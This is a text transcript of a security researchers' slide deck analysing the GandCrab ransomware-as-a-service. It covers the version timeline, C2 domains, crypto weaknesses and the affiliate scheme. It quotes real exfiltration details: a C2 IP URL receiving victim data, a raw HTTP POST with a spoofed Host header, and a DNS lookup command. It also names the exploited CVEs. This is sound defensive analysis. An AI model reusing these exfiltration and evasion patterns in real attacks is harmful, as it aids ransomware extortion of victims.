GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain...
Transcript of GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain...
![Page 1: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/1.jpg)
GANDCRAB MENTALITY
Jasper Manuel Joie Salvio
![Page 2: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/2.jpg)
GandCrab Ransomware-as-a-Service
Images by @CryptoInsane
Ransomware-as-a-Service (RaaS) • Affiliate scheme 60-40 or 70-30 • Speed, reliability, customization • Includes FUD, support, update
• Panel and Admin websites in TOR network • Must not target members of Russian
Commonwealth (AM, AZ, BY, RU, KZ, etc.)
![Page 3: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/3.jpg)
Execution Flow
Encrypt Files
Contact C2
Delete Shadow Copies
Generate Keys
Terminate Processes
Collect Victim Information
Elevate Privilege
![Page 4: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/4.jpg)
Ransom Note
Ransom Note Payment Page
Ransom Note and Payment Page
![Page 5: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/5.jpg)
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v1
v1
• First to use only DASH ($200-$1200) • .GDCB extension / GDCB-DECRYPT.txt
• .bit TLD for C2
• Uses RSA-2048/AES-CBC C2 domains
• gandcrab.bit • bleepingcomputer.bit • nomoreransom.bit • esetnod32.bit • emsisoft.bit
Vectors • RIG Exploit Kit • GRANDSOFT Exploit Kit • SPAM
Internal Versions • 1.0 • 1.1 • 2.1 • 2.1r
nslookup .exe <domain> a.dnspod.com
• 2.2r • 2.3r • 2.3.1r
![Page 6: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/6.jpg)
Encrypted File Structure
Encrypted File Content
AES Key Encrypted with RSA
![Page 7: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/7.jpg)
GandCrab v1 Weaknesses • Hard-coded RC4 key for victim info
Parameter Description
action always 'call' ip victim IP address pc_user username
pc_group domain name the machine is under pc_lang locale (e.g. en-US)
pc-keyb 1=Russian, 0=non-Russian
os_major Operating System (e.g. Windows 7 Ultimate)
os_bit Operating System Architecture (e.g. x64, x86, ARM ). ransom_id Roughly based on machine's root volume serial number hdd Information of all drives [<drive_letter>:_<drive_type>_<free_space>] pub_key RSA Public Key
priv_key RSA Private Key
version internal version hard-coded in the binary
Gathered Victim Info
Raw Victim Info
POST to http://<resolved-IP>/curl.php?token=<aff_id>
http://92.53.66.11/curl.php?token=1019
![Page 8: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/8.jpg)
GandCrab v1 Weaknesses
RC4 Key
Encrypt data with RC4
![Page 9: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/9.jpg)
GandCrab v1 Weaknesses • CRYPT_VERIFYCONTEXT flag not set
CRYPT_VERIFYCONTEXT Flag not set
Function to generate RSA keys
Generated private key Stored locally
![Page 10: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/10.jpg)
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v1
Decryptor Released
• Feb.28 , Romanian Police released a decryption tool for v1
• 50,000 victims in a month • $300k - $600k estimated
payments • Mostly US and UK
![Page 11: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/11.jpg)
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
• Payment page was compromised
• GandCrab v2 will be released soon
• Fired the web developer
• “Fortified” their infrastructures
GandCrab v1
Decryptor Released
GandCrab breach announcement
![Page 12: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/12.jpg)
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v2
v2
C2 domains • gdcb.bit • emsisoft.bit • gandcrab.bit • politiaromana.bit • malwarehunterteam.bit
• .CRAB extension / CRAB-DECRYPT.txt
• Core payload is now a DLL • Added Info parameters:
• id • subid
• Fake host header: bitdefender.com
Internal Versions
• 1.0.0r • kto_zaskrinit_tot_pidor • 1.2.0 • 1.2.1
![Page 13: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/13.jpg)
GandCrab v2 POST /loey?lfeighss=oa&eas=fai HTTP/1.1 Host: bitdefender.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Content-Length: 5880 Cache-Control: no-cache EQp98lcg4tzXH5KsHq7sNWqdQ8tncHJCkQO62jrhXSiV7VRDI88eJ5G2658rSKgAyfPUtJlUyIk5AOI+jkGHhmGiDgiVUzJjZSJ1Xyko1hgjn5r9mohEAQrviJj7PPdgPrTO/yyJdgRxH/o09gsT+NZ3T9Ou8qFPRa+/pNA07skamoilCi/M/vzTbaDIOsOEzmMLaKRChA9VyLhBF6acBRUQRVRLTLiF+TPHPKrgLzVpasnQtEyzVWCa0ETM9CyQUsNsWL30q8eFanG5qw8WcgkTpMPfNyqF1Eo62dBj1lFVM4603G…
Host: bitdefender.com
![Page 14: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/14.jpg)
CRC32 CRC32
Initial crc = 0x29a (666)
Pseudo-random RC4 Key
• Pseudo-random RC4 key to encrypt victim info
“fowge?eiplei=deoresc” “europol” C10A57D3europol
RC4 Key
POST victim info to http://<resolved-IP>/<pseudo-random string>
http://92.53.66.11/fowge?eiplei=deoresc
![Page 15: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/15.jpg)
Fixed CRYPT Flag
Function to generate RSA keys
![Page 16: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/16.jpg)
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v2.1
• Fake host header: ahnlab.com C2 domains
• ransomware.bit • zonealarm.bit
Internal Versions • 2.3.1 • 2.3.2 • 3.0.0
v2.1
GandCrab 2.1 Ransom Note
![Page 17: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/17.jpg)
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v3 • Changes wallpaper
• Fake host header: yahoo.com
• Adds autorun to HKLM for admin users
C2 domains • carder.bit • ransomware.bit
Internal Versions • 3.0.0 • 3.0.1
v3
GandCrab Changes Wallpaper
![Page 18: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/18.jpg)
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v3 Bug Unintentional “Lock Screen” on Windows 7 OS upon reboot
v3
![Page 19: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/19.jpg)
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v4 • Switches to RSA-Salsa20 encryption algorithm
• Encrypts offline
• Encrypts Network Shares
• Sandbox evasions (removed later)
• Anti-disassembly
• Removed wallpaper change
• Major code structure makeover
v4
Internal Versions • v4.0 • v4.1 • v4.1.1 • v4.1.2 • v4.1.3
• v4.1.2(new variant) • v4.2 • v4.2.1 • v4.3 • v4.4
Victim data and key in ransom note
![Page 20: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/20.jpg)
Encrypted File Structure
Encrypted File Content
Salsa20 Key Encrypted with RSA Public Key
![Page 21: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/21.jpg)
Keys in the Ransom Note
32-byte Salsa20 Key
RSA-2058 Private Key
Also stored in: HKCU\Software\keys_data\data\private
![Page 22: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/22.jpg)
Encrypted Keys
RSA KEY Public Private
Salsa20 Key
RSA-2058 Private Key
(Encrypted with Salsa20)
SALSA20
Private
32-byte Salsa20 Key (Encrypted with RSA)
RSA
Salsa20 Key
![Page 23: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/23.jpg)
GandCrab v4 Timeline
July Aug
Jul 04
v4.1 • Sends victim data
to a long list of URLs
v4.1.2 (new variant) GandCrab switches to mutex check v4.2 • Update picked up from
new 4.1.2 • Adds sandbox evasion
tricks
Jul 20
Aug 02
v4.2.1 • Removes VM evasion
function • Adds a link to POC of a
Denial-of-Service attack on Ahnlab’s AV component
v4.3 • Adds anti-disassembly trick
Vaccine v1 Ahnlab releases a vaccine based on .lock filename
Jul 13
Vaccine v2 Ahnlab releases a second version of the vaccine
Jul 18
v4.1.3 • No major
changes
v4.4 • Works as a vaccine by creating
the ransomware mutex. Did not work on win7 at first
Aug 06
Jul 17
v4.1.2 • Uses Salsa20 to generate
the .lock filename
Jul 11
v4.1.1 • No major changes
v4.0 • Salsa20/20 algorithm • Offline encryption • Encrypts network shares • Checks <8hex-chars>.lock
Jul 02 Jul 19
![Page 24: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/24.jpg)
Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec
GandCrab v5
v5
• <5-10_random_char> extension
• Exploits used to elevate privilege • ALPC EOP Vulnerability (CVE-2018-8440) • Win32k EOP Vulnerability CVE-2018-8120
• HTML ransom note, and added support for other languages
• Wallpaper feature (in some variants)
Internal Versions • v5.0 • v5.0.1 • v5.0.2 • v5.0.3
• v5.0.4 • v5.0.5
![Page 25: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/25.jpg)
GandCrab v5 Decryptor
• GandCrab released keys for Syrian victims • Bitdefender released free decryptor for versions v1, v4, v5 (5.0.1-5.0.4) • Decryptor does not work on v5.0.5, just after a day
Post of Syrian key release
Bitdefender releases free decryptor
![Page 26: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/26.jpg)
Crypter partnership • GandCrab partners with NTCrypt for a crypter service • $100 (one-time stub) $350 (two stubs/week)
GandCrab announces “Crypt Competition”
NTCrypt wins the deal
![Page 27: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/27.jpg)
Conclusion
• Have good marketing skills to keep the trust of their affiliates and to build new partnerships.
• Try to compensate the not so advance malware with quick releases of new variants.
• Are very quick to react to solutions against them.
• Are loud, crazy, and very confident on what they do.
The people behind Gandcrab…
![Page 28: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/28.jpg)
C2 Visit Count
0
50000
100000
150000
200000
250000
300000
350000 ransomware.bitpolitiaromana.bitnomoreransom.bitmalwarehunter.bitgdcb.bitgandcrab.bitesetnod32.bitemsisoft.bitbleepingcomputer.bitcarder.bit
v1 v2 V2.1 v3
![Page 29: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/29.jpg)
Online Infection Map
0
500000
1000000
1500000
VISIT COUNT (top 10)
![Page 30: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/30.jpg)
Move to Asian Market
• GandCrab looking for partners in a Chinese underground forum • VenusLocker campaign targeting South Korea
![Page 31: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/31.jpg)
Sample Distribution
0
2000
4000
6000
8000
10000
12000
Samples Received Per Month (2018)
v1 v2 v3 v4 v5
![Page 32: GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain name the machine is under pc_lang locale (e.g. en-US) pc-keyb 1=Russian, 0=non-Russian](https://reader033.fdocuments.net/reader033/viewer/2022041505/5e249f778e3c73626313acc7/html5/thumbnails/32.jpg)
References
• https://securingtomorrow.mcafee.com/mcafee-labs/rapidly-evolving-ransomware-gandcrab-version-5-partners-with-crypter-service-for-obfuscation/
• https://research.checkpoint.com/gandcrab-ransomware-mindset/
• https://www.bleepingcomputer.com/news/security/gandcrab-devs-release-decryption-keys-for-syrian-victims/
• Special thanks to @MarceloRivero, @ValthekOn